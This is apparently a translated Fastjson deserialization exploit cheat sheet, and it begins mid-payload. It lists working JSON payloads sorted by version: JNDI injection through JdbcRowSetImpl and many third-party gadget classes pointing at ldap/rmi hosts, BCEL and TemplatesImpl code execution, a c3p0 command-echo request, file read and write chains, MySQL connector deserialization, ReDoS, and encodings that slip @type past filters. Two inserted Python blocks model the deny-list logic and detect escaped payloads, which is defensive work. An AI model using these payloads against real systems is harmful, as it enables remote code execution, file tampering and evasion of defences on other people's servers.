d5ドルcO$e6u5ドルe$c5c$a95ドルd8ドルd91ドルu$k3ドルa$ff$J$bbg$ef$a1OW$ab$e8$afb$cf5ドルd3ドルc9ドルe$da5ドルb$c5$be$w$f6$cb$a03$a1e3ドルa$aaD$e7Qz91ドル7ドルe60ドル9ドルd$fe6b$a7$eeH$e6$d9$y$bb8ドルcAj95ドル$ec85ドル83ドル5ドルe92ドルIhP$b18ドルd3ドルa$d0G$bb$n$b4$e306$n87ドル$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC77ドルe$c0VP$a9x80ドル$k$fc$K$j$bfa3ドルb7ドルe$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a588ドル7ドルb$d8$V$ec$c793ドル$U$edY$c4$k$S$b8M$c1S$K9ドルeVp$a8$$$c3M$b87ドルfF$n$i$da$k$c293ドルs$a3$e0993ドルd87ドルk$pv$e4$l3ドルeQL40ドルE$J$A$A" } } : "xxx" } }
1.2.33 <= fastjson <= 1.2.36
{
"name":
{
"@type" : "java.lang.Class",
"val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
},
"x" : {
"name": {
"@type" : "java.lang.Class",
"val" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
{
"@type":"com.alibaba.fastjson.JSONObject",
"c": {
"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName":"$$BCEL..."
}
} : "ddd"
}
}
1.2.37 <= fastjson <= 1.2.47
{
"name":
{
"@type" : "java.lang.Class",
"val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
},
"x" : {
"name": {
"@type" : "java.lang.Class",
"val" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"y": {
"@type":"com.alibaba.fastjson.JSONObject",
"c": {
"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName":"$$BCEL$..",
"$ref": "$.x.y.c.connection"
}
}
}
}
Other
{
"@type": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource",
"key": {
"@type": "java.lang.Class",
"val": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driver": "$$BCEL$$xxxxxxx"
}
Exploitation conditions are strict; usable when the target has no outbound network access.
When parseObject() is called, the Feature.SupportNonPublicField parameter must be passed.
_bytecodes must be base64-encoded.
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["..."],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}
Usable when the target has no outbound network access.
fastjson <1.2.47
Uses c3p0 secondary deserialization of a CC payload to get command output echoed back.
POST /json HTTP/1.1
Host: 127.0.0.1:8999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
cmd: dir
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 8925

{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap}}
From 1.2.25 on, TypeUtils.loadClass was replaced with the checkAutoType() function, and a blacklist and a whitelist were added.
autoTypeSupport defaults to false.
When autoTypeSupport is false, the blacklist is checked first, then the whitelist; if the whitelist matches, the class is loaded directly, otherwise an error is thrown.
When autoTypeSupport is true, the whitelist is checked first; if it matches, the class is loaded; otherwise the blacklist is checked.
1.2.25 blacklist
- bsh
- com.mchange
- com.sun.
- java.lang.Thread
- java.net.Socket
- java.rmi
- javax.xml
- org.apache.bcel
- org.apache.commons.beanutils
- org.apache.commons.collections.Transformer
- org.apache.commons.collections.functors
- org.apache.commons.collections4.comparators
- org.apache.commons.fileupload
- org.apache.myfaces.context.servlet
- org.apache.tomcat
- org.apache.wicket.util
- org.codehaus.groovy.runtime
- org.hibernate
- org.jboss
- org.mozilla.javascript
- org.python.core
- org.springframework
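To make the check order above concrete, here is an added Python model of the decision (not fastjson's own code, which also uses hashed lists and a class cache): it applies the 1.2.25 prefix list just given, normalises the `L...;` and `[` descriptor spellings that this page mentions as blacklist bypasses so they resolve to the underlying class before matching, and returns whether a given @type would be loaded under each setting. The accept-list prefix `com.example.` used in the demo is a placeholder.

```python
"""Model of the checkAutoType ordering described above.

Added example, not fastjson's own code: it reproduces only the decision order
the text states (deny list vs accept list under autoTypeSupport false/true)
with prefix matching, and normalises the "L...;" / "[" wrappers so that they
resolve to the underlying class before matching. The real implementation also
uses hashed lists, a class cache and more; treat this as a policy model for
reasoning about configurations.
"""
from dataclasses import dataclass

# The 1.2.25 plaintext deny list as listed above.
DENY_1_2_25 = (
    "bsh", "com.mchange", "com.sun.", "java.lang.Thread", "java.net.Socket",
    "java.rmi", "javax.xml", "org.apache.bcel", "org.apache.commons.beanutils",
    "org.apache.commons.collections.Transformer",
    "org.apache.commons.collections.functors",
    "org.apache.commons.collections4.comparators", "org.apache.commons.fileupload",
    "org.apache.myfaces.context.servlet", "org.apache.tomcat", "org.apache.wicket.util",
    "org.codehaus.groovy.runtime", "org.hibernate", "org.jboss",
    "org.mozilla.javascript", "org.python.core", "org.springframework",
)


def normalize_class_name(type_name: str) -> str:
    """Reduce JVM descriptor spellings to the plain class name before matching.

    "[" array prefixes and "L...;" wrappers (possibly repeated) are stripped, so
    a deny-list comparison sees the same name whichever spelling was used.
    """
    name = type_name.strip()
    while name.startswith("["):
        name = name[1:]
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


@dataclass
class AutoTypePolicy:
    auto_type_support: bool = False   # fastjson default from 1.2.25 on
    accept: tuple = ()                # whitelist prefixes (empty by default)
    deny: tuple = DENY_1_2_25         # blacklist prefixes

    def check(self, type_name: str) -> tuple:
        """Return (allowed, reason) for an @type value."""
        name = normalize_class_name(type_name)
        on_accept = any(name.startswith(p) for p in self.accept)
        on_deny = any(name.startswith(p) for p in self.deny)
        if not self.auto_type_support:
            # deny list first, then accept list; anything else is rejected
            if on_deny:
                return (False, "deny list")
            if on_accept:
                return (True, "accept list")
            return (False, "not on accept list")
        # autoTypeSupport on: accept list first, then deny list, else allowed
        if on_accept:
            return (True, "accept list")
        if on_deny:
            return (False, "deny list")
        return (True, "default allow")


if __name__ == "__main__":
    default = AutoTypePolicy()                       # shipped default
    opened = AutoTypePolicy(auto_type_support=True)  # autoTypeSupport switched on
    for t in ("com.sun.rowset.JdbcRowSetImpl", "LLcom.sun.rowset.JdbcRowSetImpl;;",
              "[com.sun.rowset.JdbcRowSetImpl", "com.zaxxer.hikari.HikariConfig"):
        print(f"{t:40} default={default.check(t)}  autoTypeSupport=true={opened.check(t)}")
```

The last name in the demo is the point of the model: with autoTypeSupport switched on, a class that is simply absent from the deny list (HikariConfig here) is loaded by default, which is why so many of the payload sections below state "AutoType must be enabled" as their precondition. With the default off and an explicit accept list, the same class is rejected as "not on accept list".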
exp
Condition: autotype must be enabled.
Prefixing the class name with L and appending ; bypasses the blacklist.
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}
Starting from version 1.2.42, the plaintext blacklist was replaced with a hash-based blacklist.
Compiled by the following master:
https://github.com/LeadroyaL/fastjson-blacklist
exp
Condition: autotype must be enabled.
Double-write bypass
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}
exp
Condition: autotype must be enabled.
Bypass by appending [{
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}
Condition: autotype must be enabled.
1.2.45 fixed the previous issues, but a bypass is possible with the help of a third-party component.
Requires MyBatis, and the version must be in the 3.x.x series, < 3.5.0.
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/badNameClass"}}
Universal exploit via the cache; the cache was changed to disabled by default in 1.2.48.
The vulnerability works by using java.lang.Class to load the JdbcRowSetImpl class into the Map cache, thereby bypassing the AutoType check.
There are two main version ranges:
- 1.2.25-1.2.32: exploitable when AutoTypeSupport is not enabled; not exploitable when it is enabled
- 1.2.33-1.2.47: exploitable regardless of whether AutoTypeSupport is enabled
poc:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://localhost:1389/badNameClass",
"autoCommit":true
}
}
For versions after 1.2.48 my own ability is limited and I have not yet reproduced or studied them; the details to watch for in the payload remain unexplored.
Regular expression denial of service (ReDoS)
{
"regex":{
"$ref":"$[\blue = /\^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$/]"
},
"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}
{
"regex":{
"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
},
"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}
AutoType must be enabled
{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
No need to enable autoType:
{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://10.10.20.166:1099/ExportObject"}
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://10.10.20.166:1389/ExportObject"}
{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:1389/Exploit","Object":"a"}
- AutoType must be enabled;
- Fastjson <= 1.2.62;
- Subject to the JDK version limits on JNDI injection;
- The target server must have the xbean-reflect package;
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://localhost:1389/Exploit"}, "namespace":""}
- AutoType must be enabled;
- Fastjson <= 1.2.66;
- Subject to the JDK version limits on JNDI injection;
- The org.apache.shiro.jndi.JndiObjectFactory class requires the shiro-core package;
- The br.com.anteros.dbcp.AnterosDBCPConfig class requires the Anteros-Core and Anteros-DBCP packages;
- The com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig class requires the ibatis-sqlmap and jta packages;
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:1389/Exploit"], "Realms":[""]}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}
File-write payload for JDK 11 and above:
{
"@type": "java.lang.AutoCloseable",
"@type": "sun.rmi.server.MarshalOutputStream",
"out": {
"@type": "java.util.zip.InflaterOutputStream",
"out": {
"@type": "java.io.FileOutputStream",
"file": "/tmp/asdasd",
"append": true
},
"infl": {
"input": {
"array": "eJxLLE5JTCkGAAh5AnE=",
"limit": 14
}
},
"bufLen": "100"
},
"protocolVersion": 1
}
- AutoType must be enabled;
- Fastjson <= 1.2.67;
- Subject to the JDK version limits on JNDI injection;
- The org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup class requires the ignite-core, ignite-jta and jta dependencies;
- The org.apache.shiro.jndi.JndiObjectFactory class requires the shiro-core and slf4j-api dependencies;
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://localhost:1389/Exploit"], "tm": {"$ref":"$.tm"}}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/Exploit","instance":{"$ref":"$.instance"}}
- Fastjson <= 1.2.68;
- The exploit class must be a subclass or implementation of the expectClass and must not be on the blacklist;
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.caucho.config.types.ResourceRef","lookupName": "ldap://localhost:1389/Exploit", "value": {"$ref":"$.value"}}
No need to enable AutoType; this directly bypasses the checkAutoType() check and triggers execution:
{"@type":"java.lang.AutoCloseable","@type":"vul.VulAutoCloseable","cmd":"calc"}
Read file
{"@type":"java.lang.AutoCloseable", "@type":"org.eclipse.core.internal.localstore.SafeFileOutputStream", "tempPath":"C:/Windows/win.ini", "targetPath":"D:/wamp64/www/win.txt"}
Write file
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.FileOutputStream",
"file": "/tmp/nonexist",
"append": "false"
}
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.FileWriter",
"file": "/tmp/nonexist",
"append": "false"
}
Write file
{
"stream": {
"@type": "java.lang.AutoCloseable",
"@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
"targetPath": "D:/wamp64/www/hacked.txt",
"tempPath": "D:/wamp64/www/test.txt"
},
"writer": {
"@type": "java.lang.AutoCloseable",
"@type": "com.esotericsoftware.kryo.io.Output",
"buffer": "cHduZWQ=",
"outputStream": {
"$ref": "$.stream"
},
"position": 5
},
"close": {
"@type": "java.lang.AutoCloseable",
"@type": "com.sleepycat.bind.serial.SerialOutput",
"out": {
"$ref": "$.writer"
}
}
}
Write file
{
'stream':
{
'@type':"java.lang.AutoCloseable",
'@type':'java.io.FileOutputStream',
'file':'/tmp/nonexist',
'append':false
},
'writer':
{
'@type':"java.lang.AutoCloseable",
'@type':'org.apache.solr.common.util.FastOutputStream',
'tempBuffer':'SSBqdXN0IHdhbnQgdG8gcHJvdmUgdGhhdCBJIGNhbiBkbyBpdC4=',
'sink':
{
'$ref':'$.stream'
},
'start':38
},
'close':
{
'@type':"java.lang.AutoCloseable",
'@type':'org.iq80.snappy.SnappyOutputStream',
'out':
{
'$ref':'$.writer'
}
}
}
Applicable to JDK 8/10
{
"@type": "java.lang.AutoCloseable",
"@type": "sun.rmi.server.MarshalOutputStream",
"out": {
"@type": "java.util.zip.InflaterOutputStream",
"out": {
"@type": "java.io.FileOutputStream",
"file": "dst",
"append": "false"
},
"infl": {
"input": "eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="
},
"bufLen": 1048576
},
"protocolVersion": 1
}
JDK 8
- The length written via position must equal the length of the data before base64 encoding.
{
"stream": {
"@type": "java.lang.AutoCloseable",
"@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
"targetPath": "f:/pwn.txt",
"tempPath": ""
},
"writer": {
"@type": "java.lang.AutoCloseable",
"@type": "com.esotericsoftware.kryo.io.Output",
"buffer": "YjF1M3I=",
"outputStream": {
"$ref": "$.stream"
},
"position": 5
},
"close": {
"@type": "java.lang.AutoCloseable",
"@type": "com.sleepycat.bind.serial.SerialOutput",
"out": {
"$ref": "$.writer"
}
}
}
Disclosed by Tencent Xuanwu Lab at Black Hat 2021
Detailed vulnerability principle still to be studied.
https://b1ue.cn/archives/506.html
MySQL Connector 5.1.x
{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"mysql.host","portToConnectTo":3306,"info":{"user":"user","password":"pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS": "1"},"databaseToConnectTo":"dbname","url":""}
MySQL Connector 6.0.2 or 6.0.3
{"@type": "java.lang.AutoCloseable","@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection","proxy":{"connectionString":{"url": "jdbc:mysql://localhost:3306/foo?allowLoadLocalInfile=true"}}}
MySQL Connector 6.x or < 8.0.20
{"@type":"java.lang.AutoCloseable","@type":"com.mysql.cj.jdbc.ha.ReplicationMySQLConnection","proxy":{"@type":"com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy","connectionUrl":{"@type":"com.mysql.cj.conf.url.ReplicationConnectionUrl", "masters": [{"host":"mysql.host"}], "slaves":[], "properties":{"host":"mysql.host","user":"user","dbname":"dbname","password":"pass","queryInterceptors":"com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true"}}}}
To be explored
{"@type":"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}}
{"@type":"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory", "tmJndiName": "ldap://localhost:1389/Exploit", "tmFromJndi": true, "transactionManager": {"$ref":"$.transactionManager"}}
Recommended article: https://www.sec-in.com/article/950
By default Fastjson strips whitespace, \b, \n, \r, \f and similar characters outside keys and values, and it also automatically decodes unicode and hexadecimal escapes inside keys and values.
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{ "@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{/*s6*/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{\n"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"@type"\b:"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\x40\x74\x79\x70\x65":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
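The variants just listed are why a WAF or log rule that looks for the literal string `"@type"` misses requests that Fastjson itself parses happily. The following added Python example (not Fastjson's code) normalises a body the way the text above says Fastjson does, comments out, `\uXXXX` and `\xXX` escapes decoded, separator characters dropped outside quoted strings, and only then extracts the `@type` values and matches them against a watch list built from the DNS-probe classes in the version-detection section at the top of this page and the JdbcRowSetImpl gadget. The sample bodies and the watch list are constructed here from the page's payload shapes; the `attacker.invalid` host is a placeholder.

```python
"""Normalise a request body the way the text says fastjson does, then look for
@type values on a watch list.

Added example, not fastjson's own code. WATCH_TYPES and SAMPLES are constructed
here from the payload shapes listed on this page; host names are placeholders.
"""
import re

# Class names the page lists as version probes, plus the JdbcRowSetImpl gadget.
WATCH_TYPES = {
    "java.net.URL": "version probe (dnslog)",
    "java.net.InetAddress": "version probe (dnslog)",
    "java.net.Inet4Address": "version probe (dnslog)",
    "java.net.Inet6Address": "version probe (dnslog)",
    "java.net.InetSocketAddress": "version probe (dnslog)",
    "com.sun.rowset.JdbcRowSetImpl": "JNDI gadget",
}

_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")
_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
_SEPARATORS = " \t\b\n\r\f"            # the characters the text says are ignored
_TYPE_KEY = re.compile(r"""["']@type["']:["']([^"']+)["']""")


def _strip_separators(s: str) -> str:
    """Drop separator characters between tokens, leaving quoted strings intact."""
    out, in_str, quote, i = [], False, "", 0
    while i < len(s):
        ch = s[i]
        if in_str:
            out.append(ch)
            if ch == "\\" and i + 1 < len(s):   # keep an escaped character verbatim
                out.append(s[i + 1])
                i += 2
                continue
            if ch == quote:
                in_str = False
        elif ch in ('"', "'"):                  # fastjson accepts both quote styles
            in_str, quote = True, ch
            out.append(ch)
        elif ch not in _SEPARATORS:
            out.append(ch)
        i += 1
    return "".join(out)


def normalize(body: str) -> str:
    """Comments removed, \\uXXXX and \\xXX decoded, separators stripped."""
    body = _COMMENT.sub("", body)
    body = _UNICODE.sub(lambda m: chr(int(m.group(1), 16)), body)
    body = _HEX.sub(lambda m: chr(int(m.group(1), 16)), body)
    return _strip_separators(body)


def inspect(body: str) -> list:
    """Return [(type_as_written, label)] for every @type on the watch list."""
    findings = []
    for t in _TYPE_KEY.findall(normalize(body)):
        base = t.lstrip("[")
        while base.startswith("L") and base.endswith(";"):   # L...; spellings
            base = base[1:-1]
        if base in WATCH_TYPES:
            findings.append((t, WATCH_TYPES[base]))
    return findings


# Constructed sample bodies mirroring the variants listed on this page.
_TAIL = '"dataSourceName":"rmi://attacker.invalid:1099/x","autoCommit":true}'
SAMPLES = [
    '{"@type":"com.sun.rowset.JdbcRowSetImpl",' + _TAIL,                         # plain
    '{/*s6*/"@type":"com.sun.rowset.JdbcRowSetImpl",' + _TAIL,                   # comment before key
    '{\n"@type":"com.sun.rowset.JdbcRowSetImpl",' + _TAIL,                       # newline before key
    '{"@type"\b:"com.sun.rowset.JdbcRowSetImpl",' + _TAIL,                       # backspace before colon
    r'{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl",' + _TAIL,  # unicode-escaped key
    r'{"\x40\x74\x79\x70\x65":"com.sun.rowset.JdbcRowSetImpl",' + _TAIL,            # hex-escaped key
    '{"@type":"java.net.Inet4Address","val":"dnslog"}',                          # version probe
    '{"name":"alice","age":30}',                                                  # benign
]


def naive_flagged(bodies) -> list:
    """Indexes a literal substring match on "@type" would flag."""
    return [i for i, b in enumerate(bodies) if '"@type"' in b]


def normalized_flagged(bodies) -> list:
    """Indexes the normalising inspector flags."""
    return [i for i, b in enumerate(bodies) if inspect(b)]


if __name__ == "__main__":
    print("literal match flags:", naive_flagged(SAMPLES))
    print("normalized flags:   ", normalized_flagged(SAMPLES))
    for i in normalized_flagged(SAMPLES):
        print(i, inspect(SAMPLES[i]))
```

On the constructed samples the literal match flags only the plain, comment, newline, backspace and probe bodies, while the normalising inspector also flags the `\u`- and `\x`-escaped keys and leaves the benign body alone. The same normalisation is the right place to feed any signature that keys on class names, since the class name itself can be escaped just as the key was.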